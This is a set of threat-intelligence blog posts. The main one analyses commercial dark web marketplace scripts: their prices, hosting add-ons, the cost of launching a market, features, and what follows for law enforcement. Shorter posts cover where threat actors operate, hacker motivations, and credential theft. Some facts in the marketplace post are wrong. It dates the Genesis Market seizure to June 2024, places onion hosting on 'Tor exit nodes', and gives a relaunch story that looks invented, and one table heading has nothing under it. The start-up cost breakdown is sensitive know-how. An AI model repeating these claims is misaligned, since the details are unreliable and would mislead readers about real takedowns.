The Midland City Anonymous Marketplace Script was priced at $550. This appeared to be an older codebase, Laravel 8 instead of Laravel 10, but buyers appreciated the lower price and said it had fewer dependencies. The listing showed screenshots of a clean admin panel and user management interface.

Pax Romana Dark Web Market Script had no price listed; you had to contact the vendor for a quote. The listing suggested it was a premium tier offering, pitched as suitable for ‘large-scale operations’ with support for thousands of concurrent users.

Beyond the scripts themselves, Darkweb Developer also offered complementary services. Domain registration on .onion addresses via a partnered registrar costs $25 to $50, depending on domain length. Hosting on isolated Tor exit nodes was $200 to $500 per month. Bitcoin and Monero node setup, essential for payment processing, ran $100 to $300 one-time. SSL certificates for HTTPS mirrors were $30. A full-featured admin toolkit, including vulnerability scanning and backup utilities, was $150.

The Business Model

So what you are looking at here is infrastructure-as-a-service for dark web commerce. The buyer pays an upfront fee for the script, deploys it on rented hosting, configures payment nodes, and within days has a functioning marketplace. The entry cost is minimal: $750 for the script, $300 for hosting setup, $100 for payment infrastructure, and $50 for a domain. Roughly $1,200 to start a dark web market that could handle a thousand vendors.

Compare that to building from scratch. A competent developer would spend four to six months writing marketplace software. The escrow system alone requires careful cryptographic implementation to prevent theft by the marketplace operator or disputes between buyer and vendor. The code must handle user registration, credential recovery, PGP encryption, 2FA, vendor onboarding, product category management, search functionality, reviews, dispute mediation, and admin operations. This is not a weekend project. It is six months of focused work.

By selling pre-built scripts, the vendor abstracts away that development cost. The buyer gets a tested, working system. The marketplace script vendor gets a scalable business: each sale is pure margin after the initial development investment. You sell the first copy for $750, and it takes eight months to break even on development. By month twelve, you have sold fifty copies, and you are making $30,000 per month with zero marginal cost.

The vendor also gets free marketing. Every marketplace that runs on their script is essentially an advertisement. If the script proves reliable and feature-rich, operators will use it. If it has bugs or is compromised, operators will badmouth it. The market self-corrects. The vendor’s reputation is their primary asset.

Technical Analysis

The scripts we analysed were built on Laravel 8 or 10, the PHP web framework. This is not surprising. Laravel has a large ecosystem of libraries, established security practices, and community support. It is what a professional developer would choose if building a marketplace.

Core Components

Every script included user registration and account management. The registration flow was straightforward: email, username, password, and optional PGP public key import. Users could set two-factor authentication via TOTP or hardware keys. Account recovery was via email or, in some cases, by recovering a private key if the user had set one up at registration.

Vendor management was the next layer. Vendors could create a storefront, upload product listings with descriptions and images, set pricing in Monero or Bitcoin, manage stock levels, and handle shipping addresses and tracking information. The system tracked vendor reputation via review scores and dispute resolution history. Vendors with too many chargebacks or disputes were automatically suspended.

The escrow system was the critical piece. When a buyer purchased an item, payment went into escrow controlled by the marketplace. The vendor could not access the funds until delivery was confirmed. The buyer had a window, typically five to fifteen days depending on marketplace configuration, to confirm receipt or file a dispute. If disputed, the funds were frozen, and a dispute resolution process began, usually mediated by marketplace administrators.

All communication between buyer and vendor was encrypted end-to-end. The scripts supported either PGP encryption of message text or a dedicated encrypted messaging interface within the marketplace. This meant the marketplace operator could not read buyer-vendor conversations even if they wanted to.

Admin Panel and Operational Tools

The admin panel was comprehensive. Operators could view transaction volumes, user counts, dispute statistics, and payment node status in real time. They could manually override user balances, freeze accounts, remove listings, and execute transactions. They could also export data for tax or accounting purposes, though in practice, no dark web market operator is actually filing tax returns.

Search and discovery were implemented via Elasticsearch in the more sophisticated scripts. Product listings were indexed by title, description, vendor name, and category. Search results could be sorted by price, rating, or recency. The Incognito Market Script listing mentioned support for ‘faceted search and automated deduplication’, which suggests a fairly mature search engine.

The admin toolkit offered backups to encrypted cloud storage, automated database replication, and vulnerability scanning. Some vendors included intrusion detection rules and log analysis tools, essentially security monitoring for the marketplace. This is paranoia in practice: dark web operators know law enforcement will eventually come for them. They want to know if it is happening.

DARKSEARCH Findings: Active Marketplace Examples

On 3 March 2026, our DARKSEARCH crawlers indexed multiple active dark web marketplaces that appear to be running on WooCommerce-derived or Laravel-based marketplace scripts. These instances demonstrate the franchising model in production; despite distinct branding and operator teams, they exhibit common codebase patterns, similar category structures, and compatible payment integration systems.

Active Marketplaces Running Marketplace Scripts

What is notable is the consistency. All three active marketplaces employ shopping cart functionality with escrow integration. All support cryptocurrency payments (BTC, XMR). All feature similar category structures (Hacking, Financial, Documents, Drugs). This suggests they are either running the same underlying script or closely derived variants. The marketplaces exhibit the exact commoditisation we discuss in this report.

The Franchising Effect

This is where the implications get serious for law enforcement and threat intelligence teams. When marketplaces were bespoke, unique codebases built by individual developers, taking one down meant that the operator was out of business. The code was gone. They had to rebuild from scratch or find another coder.

Now? The marketplace operator is fungible. The code is a commodity. When Genesis Market went dark in 2024, the operators could have immediately spun up on a new server using Genesis Market Script v2. Our DARKSEARCH crawlers have identified multiple active marketplace instances that demonstrate this exact pattern: operator churn with code persistence. Tor Amazon operates a full product catalogue with categories identical to known script templates. Tor Market advertises as a direct competitor using what appears to be a variant of the same Laravel architecture. Dark Web World deploys the same WooCommerce-derived payment processing seen across multiple independent operator teams.

So you have a franchising effect. Thirty-five to forty-five distinct marketplaces exist simultaneously, not because there are thirty-five to forty-five independent teams of developers all building competing systems. It is because there are maybe five distinct marketplace scripts in circulation, and each one has six to nine instances running at any given time. When one is seized, a new instance spins up.

This has two consequences. First, the barrier to entry for organised cybercrime has collapsed. You do not need development capability. You need capital and operational security. Second, the value of seizing a marketplace server has diminished dramatically. You disrupt that instance, but the script lives on. The operators of Tor Amazon, Tor Market, and Dark Web World can migrate to new infrastructure using the same marketplace script within days.

Available Marketplace Scripts

Marketplace Infrastructure Costs

Law Enforcement Implications

When law enforcement seizes a dark web marketplace server, they get the data but not the capability to disrupt the script. The script lives elsewhere, in version control, on backup servers, or simply in the brain of the marketplace script vendor.

Consider Genesis Market. It was seized on 2024-06-12 by US law enforcement working with Europol and the UK National Crime Agency. Servers in the US, Europe, and Asia were taken offline. The operator was charged. Hundreds of millions in stolen credentials were recovered. By mid-July, Genesis Market v2 was advertising on dark web forums with enhanced features and improved operational security.

The incident did not eliminate the infrastructure. It merely caused a six-week disruption during which the operator migrated to new hardware, patched known vulnerabilities, and rebranded slightly. The core problem, from law enforcement’s perspective, is that the script outlives any single instance. As we document in our DARKSEARCH data, marketplaces like Tor Amazon and Dark Web World can be deployed and operational within the timeframe needed to capture, examine, and seize a competing marketplace.

This suggests that the real vulnerability is not the marketplaces themselves but the marketplace script vendors. If you can identify and prosecute the developers selling these scripts, you eliminate the supply. If you only go after the marketplace operators, you get Whack-A-Mole. The vendors publishing scripts on dark web forums and registering at addresses like Go Go Onion directory are the true infrastructure.

The other implication is that dark web marketplace operators are increasingly commoditised. You do not need technical sophistication to run a marketplace. You need operational security, capital for hosting and domain registration, and connections to vendors. The technical barrier has effectively been removed.

How SOS Intelligence Tracks This

DARKSEARCH crawls the dark web continuously, indexing pages in a searchable database. We look for storefronts, forums, and marketplaces. When we detect a new marketplace script listing, we add it to a tracking watchlist.

We monitor three things. First, the script itself: which framework it uses, what features it advertises, what the pricing is, and how it has evolved. We track Incognito Market Script from version 1.2 to version 3.1, noting what features were added in each release. Second, the vendors selling the scripts: their reputation, their customers, their support practices, and whether they have ever been compromised or exit scammed. Third, the deployments: which marketplace instances are running which script version and how they behave.

We feed this intelligence into our dark web monitoring products. When a customer signs up for marketplace monitoring, we can identify the script powering that marketplace and predict what features it has based on the version. We can also correlate incidents: if Incognito Market Script v2.8 has a known vulnerability in its escrow handling, we know every instance running that version is vulnerable. Our crawlers match codebase signatures and category structures against known scripts, allowing us to identify which of the active marketplaces documented in this report (Tor Amazon, Tor Market, Dark Web World) are running compatible implementations.

This also lets us track the dark web marketplace ecosystem as a whole. We can measure how many distinct marketplaces exist, estimate their combined transaction volume by analysing blockchain data, and predict disruption likelihood based on how aggressively law enforcement is moving. When a new script is released, we see a spike in new marketplace deployments. When law enforcement takes down a market, we see migration patterns as users flee to competing platforms.

Defensive Perspective

If you are a security team responsible for monitoring dark web activity, you should be tracking marketplace scripts as a matter of course. They are not difficult to find. They advertise openly on dark web forums and marketplaces. Your crawlers can find them.

Once you have a list, you should monitor for three things. One: new script releases and what features they introduce. Two: new marketplace instances and what script they are running. Three: changes in pricing and availability. When marketplace scripts suddenly become cheaper or more feature-rich, it usually means either increased competition or that a major incident has just happened and sellers are trying to capitalise on increased demand from displaced operators.

You should also correlate marketplace incidents with script vulnerabilities. When a marketplace is compromised, check what script it ran and whether other instances of that script are vulnerable to the same attack. When law enforcement takes down a marketplace, check whether the operators released an updated version of their script specifically addressing whatever weakness led to the takedown. Monitor the DARKSEARCH indexed marketplaces for sudden architectural changes or version migrations.

From a threat intelligence perspective, tracking marketplaces via their scripts is far more efficient than tracking them as individual entities. You reduce dozens of distinct monitoring targets to a handful of script families. You can predict behaviour and vulnerability based on the codebase, not on the individual operators running that codebase.

Conclusion

The dark web marketplace economy has industrialised. What used to be bespoke, artisanal criminal enterprises are becoming commoditised services. The marketplace script vendors are the key infrastructure. They have turned marketplace operation into a scalable, reproducible business.

This has implications across the board. For law enforcement, it means seizing a marketplace is a disruption, not elimination. For threat intelligence teams, it means the unit of analysis should be the script, not the instance. For customers relying on dark web monitoring, it means the landscape is more stable and predictable than it appears.

Genesis Market, Silk Road, and the dozens of anonymous marketplaces that come and go each year are not spontaneous eruptions of criminal ingenuity. They are instances of a handful of scripts, each one serving thousands of vendors and millions of buyers. The real architecture is underneath, in the code. Our DARKSEARCH findings confirm that this franchising model is not theoretical; it is observable in real time across active marketplaces like Tor Amazon, Tor Market, and Dark Web World.

  • Genesis Market seizure: FBI Operation Cookie Monster (June 2024); US Department of Justice, Federal Bureau of Investigation, European law enforcement agency coordination.
  • Incognito Market exit scam: March 2024 withdrawal incident; documented in dark web forum discussions and community aftermath analysis.
  • Laravel framework: Open-source PHP web framework; widely used in dark web marketplace development due to established security practices and library ecosystem.
  • Europol Internet Organised Crime Threat Assessment (iOCTA): Annual monitoring of dark web marketplace proliferation, vendor ecosystem, and cross-border criminal networks.
  • UNODC monitoring: United Nations Office on Drugs and Crime; tracking of dark web marketplace proliferation, transaction volumes, and law enforcement takedown impact assessment.
  • XenForo forum platform: Identified at hxxp://bfdxjkv5e2z3ilrifzbnvxxvhbzsj67akjpj3zc6smzr4vv6oz565gyd[.]onion; forum with escrow system, deposit functionality, and account upgrades; community discussion of marketplace scripts and infrastructure.
  • DARKSEARCH API: SOS Intelligence dark web indexing and search service; provides searchable access to indexed marketplace listings, vendor profiles, and script advertisements indexed on 3 March 2026.

Market Place Photo > Photo by Kayle Kaupanger on Unsplash

Technical Photo > Photo by Steve A Johnson on Unsplash

Header Photo > Photo by Rosie Sun on Unsplash

Police Photo > Photo by Michael Förtsch on Unsplash

"Cyber
Investigation, Opinion

Beyond the Dark Web: Where Threat Actors Operate

The “dark web” has become something of a buzzword in recent years, often portrayed as the hidden underworld of the internet where cybercriminals operate in complete anonymity. For many, it conjures images of secret marketplaces, illicit data dumps, and hard-to-trace communications — all out of reach from the average internet user.

Because of this perception, it is a common misconception that all threat actor activity takes place exclusively on the dark web. While it certainly plays a role in enabling criminal operations, the truth is far more complex. Today’s threat actors are increasingly making use of platforms that are readily available, user-friendly, and in many cases, completely legal.

Much of their coordination, recruitment, and even data leakage now takes place in plain sight — across encrypted messaging apps, public forums, and mainstream social media platforms. Understanding where these actors truly operate is critical for any organisation looking to stay ahead of the threat landscape.

The Evolving Landscape of Threat Actor Platforms

The way threat actors communicate and coordinate has shifted significantly in recent years. Once heavily reliant on hidden services accessed through the Tor network, many cybercriminals are now embracing more accessible, mainstream platforms to conduct their activities.

This change has been driven by several key factors. One of the most prominent is the increased pressure from law enforcement. High-profile takedowns of dark web marketplaces such as AlphaBay and Hydra have disrupted long-standing criminal ecosystems, forcing actors to reconsider where and how they operate.

At the same time, modern platforms offer features that make them attractive to malicious users. Encrypted messaging apps provide a level of privacy that rivals, and in some cases exceeds, what is available on the dark web. Public forums and chat platforms are easy to access, require minimal technical knowledge, and can reach large audiences quickly.

For cybercriminals, scale and convenience matter. Hosting content on widely used services allows them to cast a broader net, whether they’re distributing stolen data, selling malware, or recruiting new affiliates. The lines between the open internet and covert criminal spaces are increasingly blurred, making it more difficult for defenders to track activity using traditional dark web monitoring alone.

Alternative Threat Actor Channels

While the dark web still plays a role in cybercriminal operations, many threat actors now prefer more accessible and user-friendly platforms. These alternatives offer speed, scalability, and often a surprising degree of anonymity — all without the need for specialised browsers or infrastructure. Below are some of the most commonly used non-dark web channels.

Telegram

Telegram has become a go-to platform for cybercriminals. With its end-to-end encryption, support for large group chats, and the ability to create private or public channels, it offers the ideal environment for discreet coordination at scale.

Threat actors use Telegram to:

  • Leak stolen data and documents
  • Advertise and sell credentials or access to compromised systems
  • Host scam pages or phishing kits
  • Organise affiliate networks or ransomware-as-a-service (RaaS) operations

Its minimal moderation and vast global user base make it a particularly attractive choice for cybercrime groups.

Discord and Other Chat Platforms

Originally designed for online gaming communities, Discord has evolved into a full-featured communication tool with support for text, voice, and private servers. Unfortunately, these same features have also made it a popular haven for fraudsters and cybercriminals.

Threat actors use Discord to:

  • Create closed communities centred around fraud, hacking tools, or data leaks
  • Share resources in “plug” communities — often focused on carding, identity theft, or botnet services
  • Coordinate attacks or distribute malware through seemingly innocuous links

Other platforms such as Tox, Matrix, and IRC-based services are also used, albeit with smaller user bases.

Surface Web Forums

Despite the risks of being in plain sight, many cybercrime forums continue to operate openly on the surface web. These forums are often language-specific or focused on particular sectors, such as financial fraud, social engineering, or credential stuffing.

They are typically used to:

  • Trade tools, tactics, and stolen data
  • Post tutorials or share exploit code
  • Vet and recruit participants for more private activities

Some forums operate with limited moderation or are hosted in jurisdictions with lax enforcement, allowing them to persist despite ongoing attention from security professionals.

Social Media (Twitter/X, Facebook, etc.)

Social media platforms remain surprisingly popular for certain types of threat actor activity. On services like Twitter/X, Facebook, and even LinkedIn, cybercriminals can quickly build audiences, push propaganda, or leak stolen information to make a statement.

Common uses include:

  • Publicly claiming responsibility for attacks or breaches
  • Promoting data leaks to gain notoriety or apply pressure to victims
  • Running influence campaigns or disinformation efforts
  • Recruiting low-level actors or collaborators

While these platforms generally respond quickly to takedown requests, the speed at which content can be published and spread makes them a persistent threat vector.

Paste Sites and Temporary File Hosts

Pastebin-style sites and ephemeral file hosting services continue to be used by cybercriminals to share content without needing to manage infrastructure. These services are often exploited to distribute:

  • Malware payloads
  • Indicators of compromise (IOCs)
  • Stolen credentials or internal documentation

Examples include Pastebin, Ghostbin, file.io, and anonfiles (when active). Their simplicity and temporary nature make them appealing for one-off drops or fast-moving campaigns.

Why the Shift Away from the Dark Web?

While the dark web once provided the primary infrastructure for cybercriminal marketplaces and forums, it has become a less attractive option for many threat actors. A combination of practical challenges and strategic advantages has led to a growing preference for mainstream and surface-level platforms.

One of the key drivers behind this shift is the increasing success of global law enforcement operations. High-profile takedowns such as AlphaBay, Hansa, and Hydra have not only dismantled major criminal marketplaces but also sown distrust within dark web communities. With undercover operations and seizures now a recurring threat, many actors perceive mainstream platforms as less risky in terms of operational security, particularly when combined with disposable accounts and encrypted messaging.

Technical reliability is another issue. Dark web services can suffer from poor uptime, slow performance, and hosting instability. These problems make it harder for threat actors to run consistent operations or maintain communication, especially when compared to the seamless experience offered by platforms like Telegram or Discord.

Accessibility also plays a major role. Mainstream platforms are far easier to use and require no special configuration or tools. Anyone with a smartphone can join a Telegram group or browse a fraud forum hosted on the surface web. This lowers the barrier to entry for newer or less technically skilled actors, fuelling growth in cybercriminal communities.

Finally, these platforms offer scale. Social media, public channels, and open forums provide instant access to large audiences, whether for pushing stolen data, coordinating campaigns, or recruiting collaborators. The potential for amplification far exceeds what is typically possible within the confines of the dark web.

For all these reasons, the dark web is no longer the sole or even primary location for cybercriminal activity. Threat actors are adapting to a broader, more dynamic digital environment, and defenders must do the same.

Implications for Threat Intelligence Teams

As threat actors diversify their platforms, the scope of effective cyber threat intelligence (CTI) must evolve accordingly. Relying solely on dark web monitoring is no longer sufficient. Instead, teams must broaden their visibility to include the various surface and semi-private spaces where cybercriminal activity increasingly takes place.

Monitoring closed channels such as Telegram groups, Discord servers, and niche forums has become essential. However, these spaces are often harder to access and require greater care in terms of operational security (OPSEC). Joining or observing these groups can carry significant risk if not done properly. Analysts must use hardened environments, anonymous accounts, and clear protocols to avoid detection or legal exposure.

Language skills and cultural awareness are also becoming increasingly important. Many cybercrime communities operate in non-English languages and use regional slang or coded terminology. Without this context, valuable intelligence can be missed or misinterpreted. Investing in native language analysts or translation tools can dramatically improve coverage and insight.

The scale and speed at which content is published across platforms make manual monitoring impractical. As such, automation is vital. Tools that scrape and index Telegram posts, track mentions on social media, or flag emerging IOCs can help intelligence teams respond quickly and reduce the chance of missing key developments.

Ultimately, the shift in threat actor behaviour demands a shift in defender strategy. The more fragmented and accessible the threat landscape becomes, the more agile and well-equipped CTI teams need to be in order to stay ahead.

Case Examples

LockBit’s Use of Telegram for PR and Leak Amplification (2024)

In early 2024, after suffering internal leaks and DDoS attacks against their dark web leak site, the LockBit ransomware group turned to Telegram to regain control of their narrative. The group created public Telegram channels to share statements, leak victim data, and coordinate with affiliates. This move not only ensured continuity during technical outages but also expanded their audience beyond the dark web’s limited reach.

Telegram’s encryption, ease of access, and built-in forwarding features allowed LockBit to amplify their message rapidly, including to journalists, researchers, and rival threat actors. It showcased a tactical shift: using mainstream tools as a parallel infrastructure for both influence and extortion pressure.

“Infinity Stealer” Malware Sold via Discord and GitHub (Mid–2023 Onwards)

Infinity Stealer, a malware strain targeting browser credentials and crypto wallets, began circulating heavily in 2023 via non-dark web platforms, notably Discord and GitHub. The malware was marketed in private Discord servers where prospective buyers were vetted and provided updates. GitHub repositories were used to host payloads, configuration templates, and instructions, often disguised as open-source tools.

This campaign highlights how cybercriminals are bypassing traditional marketplaces entirely, instead using legitimate platforms for both sales and delivery infrastructure. Discord’s private server structure and GitHub’s reputational cover enabled the operators to fly under the radar while still reaching a large pool of technically capable users.

Conclusion

The dark web remains a valuable source of cyber threat intelligence — but it is no longer the whole story. As cybercriminals adapt to a shifting digital landscape, they are increasingly leveraging open and semi-closed platforms like Telegram, Discord, and even mainstream social media to conduct and promote their activities.

For CTI teams, this evolution demands a broader approach. Effective monitoring now extends beyond Tor and onion domains to include a mix of channels, each with its own risks, nuances, and intelligence value. It also requires enhanced OPSEC, linguistic awareness, and the integration of automation tools to track activity at scale.

By recognising these trends and adapting monitoring strategies accordingly, defenders can stay better aligned with the current threat environment — one that is faster, more fragmented, and no longer confined to the shadows.

"Why
Investigation, Opinion

Why Hackers Hack: Exploring What Motivates Cybercriminal Activity

Cybercrime continues to rise in scale, complexity and impact, affecting individuals, businesses and governments alike. While much attention is given to how attacks happen, it’s just as important to ask why they occur in the first place. Understanding what motivates attackers is a crucial part of building an effective defence.

So, why do hackers hack?

Some are driven by financial gain, while others act on behalf of a nation-state or in support of a political cause. There are those motivated by revenge or personal challenge, and others who simply exploit opportunities because they can.

In this post, we explore the key motivations behind cybercriminal activity, helping you better understand the intent behind the threat and its implications for your organisation’s security posture.

Financial Gain

For many cybercriminals, money is the primary motivator. The vast majority of cybercrime is financially driven, with threat actors seeking to extract value from individuals, businesses or governments through theft, fraud or extortion.

Ransomware is perhaps the most well-known example. Attackers encrypt a victim’s data and demand payment, usually in cryptocurrency, in exchange for the decryption key. The rise of Ransomware-as-a-Service (RaaS) has made these attacks more accessible, allowing less technically skilled criminals to launch sophisticated campaigns using tools developed by others.

One of the most notorious examples of financially motivated cybercrime is Evil Corp, a Russia-based cybercrime group responsible for developing and distributing the Dridex banking Trojan and BitPaymer ransomware. The group, led by Maksim Yakubets, has been linked to attacks that have caused hundreds of millions of pounds in damages globally. According to the U.S. Department of the Treasury, Yakubets was allegedly tasked by Russian intelligence to conduct espionage operations alongside his cybercriminal activities. He is known not just for the scale of his crimes, but also for flaunting his wealth—reportedly driving a Lamborghini with a personalised number plate that reads “THIEF”.

Phishing and business email compromise (BEC) are also common financially motivated attacks. These techniques are designed to trick victims into handing over login credentials, payment details or other sensitive information that can be monetised directly or resold on dark web marketplaces. The FBI has reported billions of dollars in losses from BEC schemes, which often involve attackers impersonating executives or suppliers to redirect large financial transactions.

What’s particularly concerning is how mature and professionalised the cybercriminal ecosystem has become. Online forums and marketplaces, often hosted on the dark web, serve as thriving hubs where criminals buy and sell tools, data and services. This includes malware, exploit kits, stolen credentials and even technical support for other attackers. Some actors specialise in initial access, others in data theft or extortion, and many operate purely as brokers or facilitators.

As a result, modern cyberattacks are rarely the work of a lone hacker. Instead, they often involve multiple actors working together across a decentralised and anonymous marketplace. For a relatively low cost, almost anyone can purchase the tools and expertise needed to carry out a breach.

With high rewards and limited risk in many jurisdictions, financially motivated cybercrime remains one of the most significant threats facing organisations today.

Ideological or Political Motivation (Hacktivism)

Not all cybercriminals are driven by profit. Some are motivated by political beliefs, social causes or ideologies. These individuals or groups, often referred to as hacktivists, use hacking as a form of protest, aiming to disrupt, expose or embarrass organisations and governments they oppose.

One of the most recognisable hacktivist collectives is Anonymous, a loosely organised group known for its cyber campaigns against governments, corporations and extremist groups. Their activities have ranged from distributed denial of service (DDoS) attacks on financial institutions, to leaking sensitive documents from law enforcement agencies and political bodies.

Hacktivism has also played a prominent role in modern conflicts. In the early days of the Russia–Ukraine war, groups on both sides of the conflict engaged in cyber operations. Ukrainian-aligned actors, including the so-called IT Army of Ukraine, targeted Russian government websites and media outlets with defacements and DDoS attacks. Meanwhile, pro-Russian hacktivist groups like Killnet have launched attacks against European infrastructure in retaliation for political support of Ukraine.

These operations are not always highly technical, but they can be disruptive and attention-grabbing. For example, in 2022, Killnet claimed responsibility for attacks on several websites belonging to airports, healthcare providers and public institutions across Europe, using basic but effective DDoS techniques.

Hacktivism can blur the line between political protest and criminal activity. While some view it as a legitimate form of dissent in the digital age, it often involves illegal access, data leaks or service disruption, and can escalate geopolitical tensions or cause collateral damage to innocent third parties.

For defenders, politically motivated attacks pose a unique challenge. They may not follow the typical patterns of financially driven crime, and their targets can shift quickly based on current events, perceived injustices or ideological trends.

State-Sponsored Espionage

Some of the most advanced and persistent cyber threats come not from criminals seeking profit, but from nation-states pursuing strategic objectives. These attacks are often aimed at gathering intelligence, disrupting rivals, or gaining long-term access to critical systems. Unlike financially motivated actors, state-sponsored groups tend to operate with significant resources, patience and stealth.

These threat actors—often referred to as Advanced Persistent Threats (APTs)—typically target government departments, defence contractors, critical national infrastructure, and major corporations. Their goal may be to steal sensitive data, conduct surveillance, interfere with democratic processes, or enable future sabotage.

A prominent example is APT29, also known as Cozy Bear, a group linked to Russia’s Foreign Intelligence Service (SVR). They have been implicated in numerous high-profile intrusions, including the 2020 SolarWinds supply chain attack, which compromised several US federal agencies and global private sector organisations. The operation was notable for its sophistication and subtlety, remaining undetected for months.

Similarly, APT10, associated with China’s Ministry of State Security, was involved in an extensive global cyber espionage campaign targeting managed service providers (MSPs). By compromising these third-party IT providers, APT10 was able to access a wide range of downstream client networks, including government and corporate systems in the UK, US and beyond.

Unlike typical cybercriminals, these groups are often protected by their host governments and operate with impunity. They may also work in parallel with criminal organisations, blurring the lines between state and non-state activity. For example, some ransomware attacks have been linked to actors with suspected ties to nation-states, suggesting a dual-purpose intent: generating revenue while causing strategic disruption.

The motivations behind state-sponsored cyber operations are diverse, ranging from political influence and military advantage to intellectual property theft and economic gain. These campaigns are rarely random; they are calculated, well-resourced and long-term in nature.

For organisations, this means traditional defences may not be enough. Combating espionage-level threats requires a heightened focus on detection, incident response and threat intelligence, particularly for those in sensitive sectors.

Corporate or Industrial Espionage

Businesses, particularly those with valuable intellectual property and trade secrets, are prime targets for corporate or industrial espionage. Cybercriminals and competing organisations alike seek to gain an unfair advantage by stealing sensitive data related to research and development (R&D), product designs, strategic plans or proprietary technologies.

This type of espionage often overlaps with state-sponsored cyber operations, where nation-states target foreign companies to bolster their own industries or military capabilities. A notable example is the Operation Aurora campaign, uncovered in 2010, where threat actors believed to be linked to China targeted Google and dozens of other major companies. The attackers aimed to steal intellectual property and gain access to corporate networks.

Similarly, in 2021, the US Department of Justice indicted members of a Chinese hacking group known as APT41 for conducting widespread cyber intrusions into video game companies and technology firms, stealing source code and proprietary information to benefit commercial interests.

R&D-heavy sectors such as biotechnology, aerospace, automotive and software development face particularly high risks. The theft of trade secrets not only undermines a company’s competitive edge but can also result in substantial financial losses and damage to reputation.

Unlike typical financially motivated attacks, corporate espionage campaigns are usually stealthy and meticulously planned. Attackers may maintain prolonged access to compromised networks, gathering intelligence over months or even years to extract maximum value.

Organisations must therefore prioritise safeguarding their intellectual property through robust cybersecurity measures, employee awareness, and stringent access controls. Collaboration with industry partners and government agencies can also help in detecting and mitigating these sophisticated threats.

Personal Challenge or Prestige

For some hackers, the motivation is less about money or politics and more about curiosity, thrill-seeking, or the desire for recognition within their communities. These individuals often see hacking as a puzzle to be solved or a challenge to be conquered, gaining personal satisfaction and prestige among peers.

This motivation is particularly common among younger or amateur hackers, sometimes referred to as “script kiddies”, who may lack advanced skills but are eager to prove themselves by exploiting vulnerabilities or defacing websites. The hacking community online—including forums, social media groups and dark web marketplaces—can foster this behaviour, offering a platform for sharing exploits, bragging rights and reputation-building.

A notable example is the hacktivist group LulzSec, which gained international attention in 2011 through a series of high-profile attacks targeting organisations like Sony, the CIA, and PBS. Their actions were largely driven by the desire to embarrass their victims and entertain themselves, rather than for financial gain or political objectives.

Similarly, the case of Jonathan James, a teenage hacker from the United States, illustrates this motivation. At just 15 years old, James infiltrated several government systems, including NASA, stealing source code and causing significant disruption. His actions seemed motivated by the challenge and thrill of hacking rather than monetary rewards.

While these hackers might not always intend serious harm, their actions can have unintended consequences: disrupting services, compromising data, or exposing vulnerabilities that other malicious actors might exploit.

Revenge or Personal Grievances

Not all cyber threats originate externally—sometimes the greatest risks come from insiders motivated by personal grudges or feelings of revenge. Disgruntled employees, former staff or contractors with authorised access can deliberately cause harm to an organisation by leaking sensitive information, sabotaging systems or stealing data.

One of the most infamous cases involved Edward Snowden, a former NSA contractor who leaked vast amounts of classified information, motivated by a personal belief that the public had the right to know about government surveillance programmes. Though his actions sparked worldwide debate on privacy, they also caused significant damage to intelligence operations.

In the corporate sphere, a UK-based case saw a former IT administrator take revenge after being dismissed by deleting critical files and disabling user accounts, resulting in days of downtime and financial loss.

Such incidents highlight the critical importance of internal controls, thorough monitoring and robust offboarding procedures. Regularly reviewing access rights, implementing the principle of least privilege, and monitoring unusual activity can help detect and prevent insider threats before they escalate.

Organisations must balance trust with vigilance, fostering a positive workplace culture while ensuring employees understand the consequences of malicious actions.

Opportunistic or Accidental Hacking

Not all cyberattacks are the result of carefully planned operations. Many stem from opportunistic or accidental hacking, where attackers use automated tools to scan large numbers of systems for common vulnerabilities. These attacks require minimal effort but can still cause significant damage, especially to organisations or individuals with poor basic cyber hygiene.

Automated bots and scripts regularly probe the internet for unpatched software, weak passwords, misconfigured devices, or open ports. Once a vulnerability is found, the attacker may exploit it to gain access, often without a specific target in mind. This “spray and pray” approach relies on volume rather than precision.

For example, the WannaCry ransomware outbreak in 2017 rapidly spread across the globe by exploiting a known Windows vulnerability. Many affected organisations had failed to apply critical patches, making them vulnerable to this widespread, indiscriminate attack.

These types of attacks highlight the importance of fundamental cybersecurity practices: regularly updating software, using strong, unique passwords, enabling multi-factor authentication, and maintaining good network hygiene. Even basic measures can significantly reduce the risk posed by opportunistic attackers.

While opportunistic hacking might lack the sophistication or motive of targeted attacks, its impact can be equally devastating if proper precautions are not taken.

Mixed Motivations

In reality, cybercriminal motivations are often complex and overlapping rather than clear-cut. Many attacks are driven by a combination of factors—financial, political, ideological, or personal—which can make attribution and defence especially challenging.

A common scenario involves financially motivated cybercriminal groups being hired or tolerated by state actors to carry out attacks that serve national interests. These groups operate with relative impunity in exchange for providing offensive cyber capabilities or disruptive services.

For example, the notorious ransomware group REvil (also known as Sodinokibi) has been linked to criminal operations that sometimes intersect with geopolitical objectives. While primarily motivated by profit through ransomware extortion, there are indications that some affiliates have conducted operations aligning with certain state interests or received indirect protection from their home governments.

Such hybrid motivations complicate the threat landscape, blurring the lines between organised crime and state-sponsored espionage or sabotage. For defenders, understanding these intertwined incentives is crucial for developing effective cyber defence strategies and threat intelligence.

Conclusion

Cybercriminals are motivated by a wide and varied range of factors—from financial gain and political agendas to personal grudges and the pursuit of prestige. Understanding these diverse motivations is essential for organisations seeking to build effective defences in an increasingly complex cyber threat landscape.

By recognising what drives threat actors, businesses and individuals can better anticipate potential attack vectors, prioritise security investments, and tailor their incident response strategies accordingly. A threat-informed defence approach goes beyond technical measures, incorporating intelligence, awareness and proactive risk management.

As cyber threats continue to evolve, adopting a comprehensive, informed security posture is no longer optional—it is vital. Organisations should take active steps to understand their adversaries, strengthen their defences, and cultivate a culture of vigilance to stay ahead in the ongoing battle against cybercrime.

Header Photo by Furkan Elveren on Unsplash

"Compromised
Uncategorized

Compromised Password Analysis

How threat actors target your credentials and what you can do to protect yourself

Across the dark web, and shadier parts of the clear web, there is a booming marketplace for compromised credentials.  Threat actors are looking to make a quick return can monetise your sensitive data, leaving you vulnerable to further compromise.  So how do threat actors get ahold of your credentials, and what can you do to protect yourself?

How do threat actors get your credentials?

Threat actors have an arsenal of tools and techniques for obtaining credentials to facilitate further criminal activity. These range from the highly technical to meticulously researched to plain and simple brute force.  We discuss a sample of these techniques below to assist you in understanding how threat actors can obtain your credentials.

Malware

For the more technically-minded, malware can be utilised to intercept passwords being input across the internet, or just simply to steal passwords from your device.

A “man-in-the-middle” attack sees a threat actor tactically position themself between a victim and the service the victim is accessing.  While the victim is inputting their credentials, the threat actor can see the input and capture this for their use.  This technique has commonly been utilised with banking trojan’s, such as TrickBot.

